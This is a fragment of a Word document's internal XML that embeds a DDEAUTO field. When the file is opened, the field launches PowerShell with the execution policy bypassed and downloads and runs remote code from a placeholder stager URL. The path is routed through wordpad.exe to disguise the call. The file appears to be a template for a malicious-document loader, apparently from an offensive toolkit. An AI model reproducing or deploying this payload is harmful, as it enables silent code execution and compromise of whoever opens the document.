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8E" w:rsidRDefault="00774E8E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/>
    <w:p w:rsidR="00834221" w:rsidRDefault="00834221">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DDE</w:instrText>
      </w:r>
      <w:r w:rsidR="00006E49">
        <w:instrText>AUTO</w:instrText>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:instrText xml:space="preserve"> "C:\\Windows\\System32\\Accessories\\wordpad.exe\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -executionpolicy bypass iex (new-object net.webclient).downloadstring('EXPLOIT_STAGER_URL') #" "form.rtf" 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83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21"/>
    <w:rsid w:val="00006E49"/>
    <w:rsid w:val="00774E8E"/>
    <w:rsid w:val="0083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D191C-50F2-406B-A9EC-843D3DF8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innuendo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>innuendo</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-30T17:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-30T17:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>